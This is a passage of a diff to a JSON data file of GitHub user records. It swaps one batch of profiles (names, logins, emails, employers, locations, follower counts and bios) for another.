"MDQ6VXNlcjMyMzM3OQ==", - "bio": "", + "following_count": 4, + "followers_count": 23, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2013-06-21T09:54:11Z", + "updated_at": "2024-09-13T09:15:35Z", + "node_id": "MDQ6VXNlcjQ3NTg1Mjc=", + "bio": "Disclaimer: Opinions expressed are solely my own and do not express the views or opinions of my employer.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1452, + "pk": 6736, "fields": { - "nest_created_at": "2024-09-11T23:27:46.495Z", - "nest_updated_at": "2024-09-13T05:18:39.109Z", - "name": "Karthika Geethanand ¯\\_(ツ)_/¯", - "login": "karthika-g", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40568919?v=4", - "company": "Siemens", + "nest_created_at": "2024-09-22T07:47:55.734Z", + "nest_updated_at": "2024-09-22T18:50:29.347Z", + "name": "qbicfeet", + "login": "qbicfeet", + "email": "qbicfeet@swords.dance", + "avatar_url": "https://avatars.githubusercontent.com/u/27517162?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-06-25T12:56:30Z", - "updated_at": "2024-08-27T10:21:23Z", - "node_id": "MDQ6VXNlcjQwNTY4OTE5", + "public_repositories_count": 0, + "created_at": "2017-04-14T20:20:21Z", + "updated_at": "2020-08-13T17:36:39Z", + "node_id": "MDQ6VXNlcjI3NTE3MTYy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396553,199 +654327,274 @@ }, { "model": "github.user", - "pk": 1453, + "pk": 6737, "fields": { - "nest_created_at": "2024-09-11T23:27:47.729Z", - "nest_updated_at": "2024-09-11T23:27:47.729Z", - "name": "Ben Spiller", - "login": "ben-spiller", + "nest_created_at": "2024-09-22T07:47:56.050Z", + "nest_updated_at": "2024-09-22T18:50:29.658Z", + "name": "Brian Blakely", + "login": "brianblakely", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11992588?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/401422?v=4", "company": "", - "location": "Cambridge, UK", + "location": "", "collaborators_count": 0, - "following_count": 14, - "followers_count": 20, - "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2015-04-17T10:22:26Z", - "updated_at": "2024-08-18T11:27:00Z", - "node_id": "MDQ6VXNlcjExOTkyNTg4", - "bio": "Experienced Java/C#/Python/C++ software professional", + "following_count": 0, + "followers_count": 80, + "public_gists_count": 14, + "public_repositories_count": 60, + "created_at": "2010-09-16T02:25:17Z", + "updated_at": "2024-08-25T20:34:36Z", + "node_id": "MDQ6VXNlcjQwMTQyMg==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1454, + "pk": 6738, "fields": { - "nest_created_at": "2024-09-11T23:27:49.805Z", - "nest_updated_at": "2024-09-11T23:27:49.805Z", - "name": "Rodrigo Carvalho Silva", - "login": "rcsilva83", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45306?v=4", - "company": "@bacen", - "location": "Brasil", + "nest_created_at": "2024-09-22T07:47:56.359Z", + "nest_updated_at": "2024-09-22T18:50:29.979Z", + "name": "Benjamin Vincent", + "login": "Luxcium", + "email": "luxcium@neb401.com", + "avatar_url": "https://avatars.githubusercontent.com/u/42672814?v=4", + "company": "Luxcium", + "location": "Québec, Qc, Canada", "collaborators_count": 0, - "following_count": 36, + "following_count": 134, "followers_count": 51, - "public_gists_count": 3, - "public_repositories_count": 16, - "created_at": "2009-01-09T10:38:19Z", - "updated_at": "2024-08-06T16:55:15Z", - "node_id": "MDQ6VXNlcjQ1MzA2", - "bio": "", + "public_gists_count": 26, + "public_repositories_count": 47, + "created_at": "2018-08-24T11:34:54Z", + "updated_at": "2024-09-20T01:01:40Z", + "node_id": "MDQ6VXNlcjQyNjcyODE0", + "bio": "Full-time TypeScript worshiper, NodeJS enthusiast, VSCODE junkie. Benjamin Vincent✨ (cis, he/him, 🏳️‍🌈) is a lazy cat working too much🐈.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "Luxcium" } }, { "model": "github.user", - "pk": 1455, + "pk": 6739, "fields": { - "nest_created_at": "2024-09-11T23:27:51.465Z", - "nest_updated_at": "2024-09-11T23:27:51.465Z", - "name": "Benjamin Papez", - "login": "bpapez", - "email": "bpapez@jahia.com", - "avatar_url": "https://avatars.githubusercontent.com/u/753358?v=4", - "company": "Jahia Solutions GmbH", - "location": "Klagenfurt", + "nest_created_at": "2024-09-22T07:47:56.668Z", + "nest_updated_at": "2024-09-22T18:50:30.288Z", + "name": "Benjamin Cooper", + "login": "bencooper222", + "email": "bencooper222@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9143563?v=4", + "company": "@convoyinc", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2011-04-26T20:52:18Z", - "updated_at": "2024-07-30T22:54:52Z", - "node_id": "MDQ6VXNlcjc1MzM1OA==", - "bio": "", + "following_count": 3, + "followers_count": 31, + "public_gists_count": 19, + "public_repositories_count": 85, + "created_at": "2014-10-10T23:01:23Z", + "updated_at": "2024-05-22T02:36:45Z", + "node_id": "MDQ6VXNlcjkxNDM1NjM=", + "bio": "SWE at @convoyinc | IMSA '16 | Vanderbilt '20 ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "bcoops222" } }, { "model": "github.user", - "pk": 1456, + "pk": 6740, "fields": { - "nest_created_at": "2024-09-11T23:27:52.680Z", - "nest_updated_at": "2024-09-11T23:27:52.680Z", - "name": "", - "login": "oli271078", + "nest_created_at": "2024-09-22T07:47:56.996Z", + "nest_updated_at": "2024-09-22T18:50:30.600Z", + "name": "Aaron Meyers", + "login": "aaron-meyers", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43000141?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13340718?v=4", + "company": "@Microsoft", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 2, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-09-05T10:50:31Z", - "updated_at": "2024-01-24T10:17:08Z", - "node_id": "MDQ6VXNlcjQzMDAwMTQx", - "bio": "", + "public_repositories_count": 18, + "created_at": "2015-07-14T22:52:48Z", + "updated_at": "2024-09-15T22:29:22Z", + "node_id": "MDQ6VXNlcjEzMzQwNzE4", + "bio": "Principal Architect on Microsoft Power BI", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1457, + "pk": 6741, "fields": { - "nest_created_at": "2024-09-11T23:27:53.479Z", - "nest_updated_at": "2024-09-12T01:12:48.933Z", - "name": "Colm O hEigeartaigh", - "login": "coheigea", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/472162?v=4", - "company": "Qlik", - "location": "Dublin, Ireland", + "nest_created_at": "2024-09-22T07:47:57.310Z", + "nest_updated_at": "2024-09-22T18:50:30.920Z", + "name": "Allen", + "login": "VAllens", + "email": "caizz520@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5094922?v=4", + "company": "@NewLifeX", + "location": "China,Shenzhen", "collaborators_count": 0, - "following_count": 0, - "followers_count": 61, - "public_gists_count": 85, - "public_repositories_count": 61, - "created_at": "2010-11-08T09:49:13Z", - "updated_at": "2024-08-06T13:51:09Z", - "node_id": "MDQ6VXNlcjQ3MjE2Mg==", - "bio": "Senior principal product security engineer at Qlik, security contributor at @apache.", + "following_count": 8, + "followers_count": 51, + "public_gists_count": 2, + "public_repositories_count": 173, + "created_at": "2013-07-26T07:04:56Z", + "updated_at": "2024-08-28T14:07:36Z", + "node_id": "MDQ6VXNlcjUwOTQ5MjI=", + "bio": "Love life, love food, more love technology and programming. \r\nCommitted to Azure DevOps Extensions & SDK and .NET Core as well as Kubernetes.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1458, + "pk": 6742, "fields": { - "nest_created_at": "2024-09-11T23:27:54.304Z", - "nest_updated_at": "2024-09-11T23:27:54.304Z", - "name": "Mark Raynsford", - "login": "io7m", + "nest_created_at": "2024-09-22T07:47:57.632Z", + "nest_updated_at": "2024-09-22T18:50:31.253Z", + "name": "Arvin Xu", + "login": "arvinxx", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/612494?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/28616219?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 57, - "public_gists_count": 20, - "public_repositories_count": 393, - "created_at": "2011-02-11T09:37:04Z", - "updated_at": "2024-05-04T21:21:43Z", - "node_id": "MDQ6VXNlcjYxMjQ5NA==", - "bio": "Spice Miner", + "following_count": 52, + "followers_count": 1232, + "public_gists_count": 6, + "public_repositories_count": 84, + "created_at": "2017-05-11T04:32:22Z", + "updated_at": "2024-09-07T11:24:26Z", + "node_id": "MDQ6VXNlcjI4NjE2MjE5", + "bio": "Design Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1459, + "pk": 6743, "fields": { - "nest_created_at": "2024-09-11T23:27:55.522Z", - "nest_updated_at": "2024-09-11T23:27:55.522Z", - "name": "Emilio", - "login": "elahrvivaz", + "nest_created_at": "2024-09-22T07:47:57.949Z", + "nest_updated_at": "2024-09-22T18:50:31.567Z", + "name": "Arda TANRIKULU", + "login": "ardatan", + "email": "ardatanrikulu@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20847995?v=4", + "company": "@the-guild-org", + "location": "Istanbul, Turkey", + "collaborators_count": 0, + "following_count": 73, + "followers_count": 745, + "public_gists_count": 59, + "public_repositories_count": 143, + "created_at": "2016-08-04T21:55:36Z", + "updated_at": "2024-09-14T22:55:41Z", + "node_id": "MDQ6VXNlcjIwODQ3OTk1", + "bio": "TypeScript | JavaScript | GraphQL", + "is_hireable": false, + "twitter_username": "ardatanrikulu" + } +}, +{ + "model": "github.user", + "pk": 6744, + "fields": { + "nest_created_at": "2024-09-22T07:47:58.262Z", + "nest_updated_at": "2024-09-22T18:50:31.889Z", + "name": "Azat Badretdin", + "login": "azat-badretdin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7715322?v=4", - "company": "@ccri", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38532187?v=4", + "company": "NCBI/NLM/NIH/DHHS, USA", + "location": "Bethesda, MD, USA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 32, - "public_gists_count": 10, - "public_repositories_count": 14, - "created_at": "2014-05-27T15:56:40Z", - "updated_at": "2024-08-07T11:26:23Z", - "node_id": "MDQ6VXNlcjc3MTUzMjI=", - "bio": "Software Engineer", + "following_count": 1, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-04-19T13:55:21Z", + "updated_at": "2024-08-21T13:42:08Z", + "node_id": "MDQ6VXNlcjM4NTMyMTg3", + "bio": "Staff Scientist at NCBI", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1460, + "pk": 6745, "fields": { - "nest_created_at": "2024-09-11T23:27:56.339Z", - "nest_updated_at": "2024-09-11T23:27:56.339Z", - "name": "Denis Nikiforov", - "login": "AresEkb", + "nest_created_at": "2024-09-22T07:47:58.579Z", + "nest_updated_at": "2024-09-22T18:50:32.241Z", + "name": "Anthony Chu", + "login": "anthonychu", + "email": "anthony@anthonychu.ca", + "avatar_url": "https://avatars.githubusercontent.com/u/3982077?v=4", + "company": "@Microsoft @Azure ", + "location": "Vancouver, BC", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 826, + "public_gists_count": 26, + "public_repositories_count": 468, + "created_at": "2013-03-27T05:39:59Z", + "updated_at": "2024-08-28T11:26:24Z", + "node_id": "MDQ6VXNlcjM5ODIwNzc=", + "bio": "I work on Azure Container Apps", + "is_hireable": false, + "twitter_username": "nthonyChu" + } +}, +{ + "model": "github.user", + "pk": 6746, + "fields": { + "nest_created_at": "2024-09-22T07:47:58.911Z", + "nest_updated_at": "2024-09-22T18:50:32.555Z", + "name": "Luca Burgazzoli", + "login": "lburgazzoli", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2684293?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1868933?v=4", + "company": "Red Hat", + "location": "Piacenza, Italy", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 156, + "public_gists_count": 123, + "public_repositories_count": 338, + "created_at": "2012-06-19T18:18:44Z", + "updated_at": "2024-09-14T11:27:36Z", + "node_id": "MDQ6VXNlcjE4Njg5MzM=", + "bio": "", + "is_hireable": true, + "twitter_username": "lburgazzoli" + } +}, +{ + "model": "github.user", + "pk": 6747, + "fields": { + "nest_created_at": "2024-09-22T07:47:59.274Z", + "nest_updated_at": "2024-09-22T18:50:32.870Z", + "name": "Lorenzo Montanari", + "login": "l0ll098", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13736036?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 7, - "public_gists_count": 1, - "public_repositories_count": 51, - "created_at": "2012-10-30T14:53:23Z", - "updated_at": "2024-05-12T13:45:53Z", - "node_id": "MDQ6VXNlcjI2ODQyOTM=", + "following_count": 4, + "followers_count": 4, + "public_gists_count": 4, + "public_repositories_count": 10, + "created_at": "2015-08-10T18:41:00Z", + "updated_at": "2024-09-16T20:59:33Z", + "node_id": "MDQ6VXNlcjEzNzM2MDM2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396753,49 +654602,49 @@ }, { "model": "github.user", - "pk": 1461, + "pk": 6748, "fields": { - "nest_created_at": "2024-09-11T23:27:57.142Z", - "nest_updated_at": "2024-09-11T23:27:57.142Z", - "name": "Matthew", - "login": "vetsin", + "nest_created_at": "2024-09-22T07:47:59.590Z", + "nest_updated_at": "2024-09-22T18:50:33.182Z", + "name": "Liwen Guo", + "login": "Livven", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/131726?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1537947?v=4", + "company": "@databricks", + "location": "Amsterdam, Netherlands", "collaborators_count": 0, - "following_count": 9, - "followers_count": 20, - "public_gists_count": 3, + "following_count": 0, + "followers_count": 15, + "public_gists_count": 9, "public_repositories_count": 38, - "created_at": "2009-09-26T23:31:54Z", - "updated_at": "2024-08-21T03:17:28Z", - "node_id": "MDQ6VXNlcjEzMTcyNg==", - "bio": "", + "created_at": "2012-03-14T20:05:15Z", + "updated_at": "2024-09-13T11:41:50Z", + "node_id": "MDQ6VXNlcjE1Mzc5NDc=", + "bio": "Hi (ᵔᴥᵔ)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1462, + "pk": 6749, "fields": { - "nest_created_at": "2024-09-11T23:27:58.380Z", - "nest_updated_at": "2024-09-12T00:33:01.351Z", - "name": "Simon", - "login": "sbernard31", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/840294?v=4", + "nest_created_at": "2024-09-22T07:47:59.900Z", + "nest_updated_at": "2024-09-22T18:50:33.509Z", + "name": "Mark LeMerise", + "login": "MarkLeMerise", + "email": "mark@marklemerise.com", + "avatar_url": "https://avatars.githubusercontent.com/u/573634?v=4", "company": "", - "location": "France", + "location": "Detroit, Michigan", "collaborators_count": 0, - "following_count": 0, - "followers_count": 65, - "public_gists_count": 1, - "public_repositories_count": 28, - "created_at": "2011-06-09T15:49:51Z", - "updated_at": "2023-08-18T14:05:08Z", - "node_id": "MDQ6VXNlcjg0MDI5NA==", + "following_count": 18, + "followers_count": 17, + "public_gists_count": 3, + "public_repositories_count": 12, + "created_at": "2011-01-20T00:09:01Z", + "updated_at": "2024-08-28T13:56:17Z", + "node_id": "MDQ6VXNlcjU3MzYzNA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396803,99 +654652,149 @@ }, { "model": "github.user", - "pk": 1463, + "pk": 6750, "fields": { - "nest_created_at": "2024-09-11T23:27:59.601Z", - "nest_updated_at": "2024-09-11T23:27:59.601Z", - "name": "", - "login": "pvgoddijn", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/155655?v=4", + "nest_created_at": "2024-09-22T07:48:00.210Z", + "nest_updated_at": "2024-09-22T18:50:33.816Z", + "name": "Léo Colombaro", + "login": "LeoColomb", + "email": "git@colombaro.fr", + "avatar_url": "https://avatars.githubusercontent.com/u/846943?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 29, + "followers_count": 228, + "public_gists_count": 8, + "public_repositories_count": 57, + "created_at": "2011-06-13T13:55:50Z", + "updated_at": "2024-09-09T23:49:04Z", + "node_id": "MDQ6VXNlcjg0Njk0Mw==", + "bio": "🌌", + "is_hireable": true, + "twitter_username": "LeoColomb" + } +}, +{ + "model": "github.user", + "pk": 6751, + "fields": { + "nest_created_at": "2024-09-22T07:48:00.519Z", + "nest_updated_at": "2024-09-22T18:50:34.132Z", + "name": "Kevin Pollet", + "login": "kevinpollet", + "email": "pollet.kevin@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/299142?v=4", + "company": "@traefik", + "location": "France", + "collaborators_count": 0, + "following_count": 68, + "followers_count": 126, "public_gists_count": 1, - "public_repositories_count": 5, - "created_at": "2009-11-19T21:49:19Z", - "updated_at": "2023-11-01T09:42:03Z", - "node_id": "MDQ6VXNlcjE1NTY1NQ==", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "public_repositories_count": 108, + "created_at": "2010-06-07T18:57:05Z", + "updated_at": "2024-09-09T12:18:50Z", + "node_id": "MDQ6VXNlcjI5OTE0Mg==", + "bio": "Open Source @traefik ∙ Passionate learner and developer ∙ Go, Network, Containers, Cloud, and DevOps addict", + "is_hireable": true, + "twitter_username": "kevinpollet" } }, { "model": "github.user", - "pk": 1464, + "pk": 6752, "fields": { - "nest_created_at": "2024-09-11T23:28:00.431Z", - "nest_updated_at": "2024-09-11T23:28:00.431Z", - "name": "Arnout Engelen", - "login": "raboof", - "email": "github@bzzt.net", - "avatar_url": "https://avatars.githubusercontent.com/u/131856?v=4", - "company": "Self-employed, Apache Software Foundation", - "location": "Deventer, NL", + "nest_created_at": "2024-09-22T07:48:00.840Z", + "nest_updated_at": "2024-09-22T18:50:34.440Z", + "name": "Joseph Petersen", + "login": "jetersen", + "email": "me@jetersen.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/1661688?v=4", + "company": "@MovieStarPlanet", + "location": "Denmark", "collaborators_count": 0, - "following_count": 4, - "followers_count": 392, - "public_gists_count": 14, - "public_repositories_count": 673, - "created_at": "2009-09-27T12:30:18Z", - "updated_at": "2024-01-02T16:17:18Z", - "node_id": "MDQ6VXNlcjEzMTg1Ng==", - "bio": "Available for Open Source contract work", + "following_count": 6, + "followers_count": 107, + "public_gists_count": 11, + "public_repositories_count": 243, + "created_at": "2012-04-20T04:48:21Z", + "updated_at": "2024-09-16T12:00:38Z", + "node_id": "MDQ6VXNlcjE2NjE2ODg=", + "bio": "I like to automate 🤖, drink coffee ☕ and code away at the keyboard 👨‍💻", + "is_hireable": true, + "twitter_username": "jetersen" + } +}, +{ + "model": "github.user", + "pk": 6753, + "fields": { + "nest_created_at": "2024-09-22T07:48:01.172Z", + "nest_updated_at": "2024-09-22T18:50:34.798Z", + "name": "Jonathan Carter", + "login": "lostintangent", + "email": "lostintangent@github.com", + "avatar_url": "https://avatars.githubusercontent.com/u/116461?v=4", + "company": "GitHub", + "location": "Seattle, WA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1023, + "public_gists_count": 63, + "public_repositories_count": 125, + "created_at": "2009-08-18T07:27:52Z", + "updated_at": "2024-09-18T23:20:15Z", + "node_id": "MDQ6VXNlcjExNjQ2MQ==", + "bio": "I build stuff @githubnext (prev. Microsoft) and maintain a bunch of two-worded VS Code extensions (CodeTour, GistPad, CodeSwing, WikiLens, GitDoc, 🤦)", "is_hireable": false, - "twitter_username": "" + "twitter_username": "lostintangent" } }, { "model": "github.user", - "pk": 1465, + "pk": 6754, "fields": { - "nest_created_at": "2024-09-11T23:28:01.286Z", - "nest_updated_at": "2024-09-11T23:28:01.286Z", - "name": "Luc Kleeven", - "login": "lkleeven", + "nest_created_at": "2024-09-22T07:48:01.500Z", + "nest_updated_at": "2024-09-22T18:50:35.108Z", + "name": "Joel Verhagen", + "login": "joelverhagen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33747863?v=4", - "company": "bol.com", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/94054?v=4", + "company": "Microsoft", + "location": "Cincinnati, OH", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-11-17T08:52:46Z", - "updated_at": "2024-03-18T07:32:51Z", - "node_id": "MDQ6VXNlcjMzNzQ3ODYz", - "bio": "", + "followers_count": 214, + "public_gists_count": 58, + "public_repositories_count": 82, + "created_at": "2009-06-10T18:10:54Z", + "updated_at": "2024-07-30T22:11:59Z", + "node_id": "MDQ6VXNlcjk0MDU0", + "bio": "I am a software developer at Microsoft, working on NuGet, the .NET package manager.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "joelverhagen" } }, { "model": "github.user", - "pk": 1466, + "pk": 6755, "fields": { - "nest_created_at": "2024-09-11T23:28:02.130Z", - "nest_updated_at": "2024-09-11T23:29:52.391Z", - "name": "", - "login": "XSpielinbox", + "nest_created_at": "2024-09-22T07:48:01.821Z", + "nest_updated_at": "2024-09-22T18:50:35.415Z", + "name": "Molly Crendraven", + "login": "drazisil", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/55600187?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/190986?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2019-09-20T18:25:56Z", - "updated_at": "2024-09-06T11:58:35Z", - "node_id": "MDQ6VXNlcjU1NjAwMTg3", + "following_count": 145, + "followers_count": 86, + "public_gists_count": 37, + "public_repositories_count": 82, + "created_at": "2010-01-27T16:01:52Z", + "updated_at": "2024-09-07T18:01:26Z", + "node_id": "MDQ6VXNlcjE5MDk4Ng==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396903,74 +654802,99 @@ }, { "model": "github.user", - "pk": 1467, + "pk": 6756, "fields": { - "nest_created_at": "2024-09-11T23:28:04.180Z", - "nest_updated_at": "2024-09-11T23:28:04.180Z", - "name": "Piotr P. Karwasz", - "login": "ppkarwasz", - "email": "piotr@github.copernik.eu", - "avatar_url": "https://avatars.githubusercontent.com/u/12533274?v=4", - "company": "Copernik.eu", - "location": "Gdynia, Poland", + "nest_created_at": "2024-09-22T07:48:02.157Z", + "nest_updated_at": "2024-09-22T18:50:35.735Z", + "name": "Gilad Peleg", + "login": "pgilad", + "email": "gilad@giladpeleg.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4533329?v=4", + "company": "@forter ", + "location": "Tel Aviv, Israel", "collaborators_count": 0, - "following_count": 26, - "followers_count": 20, - "public_gists_count": 4, - "public_repositories_count": 57, - "created_at": "2015-05-20T17:46:18Z", - "updated_at": "2024-08-31T09:54:53Z", - "node_id": "MDQ6VXNlcjEyNTMzMjc0", + "following_count": 92, + "followers_count": 114, + "public_gists_count": 52, + "public_repositories_count": 80, + "created_at": "2013-05-26T15:01:59Z", + "updated_at": "2024-09-12T15:46:34Z", + "node_id": "MDQ6VXNlcjQ1MzMzMjk=", + "bio": "\"Give me six hours to chop down a tree and I will spend the first four sharpening the axe.\" (Abraham Lincoln)", + "is_hireable": false, + "twitter_username": "GiladPeleg" + } +}, +{ + "model": "github.user", + "pk": 6757, + "fields": { + "nest_created_at": "2024-09-22T07:48:02.472Z", + "nest_updated_at": "2024-09-22T18:50:36.054Z", + "name": "Ian MacLeod", + "login": "nevir", + "email": "ian@nevir.net", + "avatar_url": "https://avatars.githubusercontent.com/u/41373?v=4", + "company": "@mystery", + "location": "Seattle, WA", + "collaborators_count": 0, + "following_count": 62, + "followers_count": 160, + "public_gists_count": 51, + "public_repositories_count": 267, + "created_at": "2008-12-18T22:10:20Z", + "updated_at": "2024-09-20T10:10:12Z", + "node_id": "MDQ6VXNlcjQxMzcz", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1468, + "pk": 6758, "fields": { - "nest_created_at": "2024-09-11T23:28:06.269Z", - "nest_updated_at": "2024-09-11T23:28:06.269Z", - "name": "Apusic", - "login": "apusic", + "nest_created_at": "2024-09-22T07:48:02.800Z", + "nest_updated_at": "2024-09-22T18:50:36.359Z", + "name": "Ian Shipman", + "login": "GambolingPangolin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40617096?v=4", - "company": "Apusic", - "location": "Shenzhen, China", + "avatar_url": "https://avatars.githubusercontent.com/u/22924983?v=4", + "company": "Bitnomial", + "location": "Chicago, IL", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-06-27T01:28:32Z", - "updated_at": "2024-06-13T05:00:25Z", - "node_id": "MDQ6VXNlcjQwNjE3MDk2", - "bio": "apusic.com", + "following_count": 14, + "followers_count": 31, + "public_gists_count": 3, + "public_repositories_count": 22, + "created_at": "2016-10-19T01:27:42Z", + "updated_at": "2024-09-20T20:20:06Z", + "node_id": "MDQ6VXNlcjIyOTI0OTgz", + "bio": "..oo^^vv^^oo..", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1469, + "pk": 6759, "fields": { - "nest_created_at": "2024-09-11T23:28:07.098Z", - "nest_updated_at": "2024-09-11T23:28:07.098Z", - "name": "", - "login": "lonewalker0", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/112616871?v=4", + "nest_created_at": "2024-09-22T07:48:03.119Z", + "nest_updated_at": "2024-09-22T18:50:36.668Z", + "name": "Ilia Rogozhin", + "login": "smallcreep", + "email": "ilia.rogozhin@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5305846?v=4", "company": "", - "location": "", + "location": "Batumi", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 5, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2022-09-01T08:22:48Z", - "updated_at": "2024-06-25T07:58:54Z", - "node_id": "U_kgDOBrZlpw", + "public_repositories_count": 34, + "created_at": "2013-08-25T12:27:56Z", + "updated_at": "2024-08-15T11:45:34Z", + "node_id": "MDQ6VXNlcjUzMDU4NDY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396978,174 +654902,174 @@ }, { "model": "github.user", - "pk": 1470, + "pk": 6760, "fields": { - "nest_created_at": "2024-09-11T23:28:07.922Z", - "nest_updated_at": "2024-09-18T18:57:18.734Z", - "name": "", - "login": "jonnybecker", + "nest_created_at": "2024-09-22T07:48:03.430Z", + "nest_updated_at": "2024-09-22T18:50:37.007Z", + "name": "Ivan", + "login": "Chi-teck", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2277642?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/673139?v=4", "company": "", - "location": "", + "location": "Russia", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 35, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2012-09-04T12:38:48Z", - "updated_at": "2024-09-06T11:14:46Z", - "node_id": "MDQ6VXNlcjIyNzc2NDI=", - "bio": "", - "is_hireable": false, + "public_repositories_count": 93, + "created_at": "2011-03-16T13:54:34Z", + "updated_at": "2024-07-26T13:41:52Z", + "node_id": "MDQ6VXNlcjY3MzEzOQ==", + "bio": "Drupal developer", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1471, + "pk": 6761, "fields": { - "nest_created_at": "2024-09-11T23:29:46.020Z", - "nest_updated_at": "2024-09-11T23:29:46.020Z", - "name": "", - "login": "benno85", + "nest_created_at": "2024-09-22T07:48:03.742Z", + "nest_updated_at": "2024-09-22T18:50:37.318Z", + "name": "Jacob Tyler", + "login": "JacobAGTyler", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/48588075?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3827053?v=4", "company": "", - "location": "Nuremberg, Germany", + "location": "Letchworth, Hertfordshire, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 14, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-03-15T10:15:49Z", - "updated_at": "2024-03-01T14:27:08Z", - "node_id": "MDQ6VXNlcjQ4NTg4MDc1", + "public_repositories_count": 30, + "created_at": "2013-03-11T00:08:58Z", + "updated_at": "2024-08-05T22:36:33Z", + "node_id": "MDQ6VXNlcjM4MjcwNTM=", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "JacobAGTyler" } }, { "model": "github.user", - "pk": 1472, + "pk": 6762, "fields": { - "nest_created_at": "2024-09-11T23:29:55.246Z", - "nest_updated_at": "2024-09-18T18:57:27.173Z", - "name": "sluetge", - "login": "RSM-SLU", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/105483343?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:04.066Z", + "nest_updated_at": "2024-09-22T18:50:37.633Z", + "name": "James Strachan", + "login": "jstrachan", + "email": "james.strachan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/30140?v=4", + "company": "Apple", + "location": "Mells, UK", "collaborators_count": 0, - "following_count": 0, 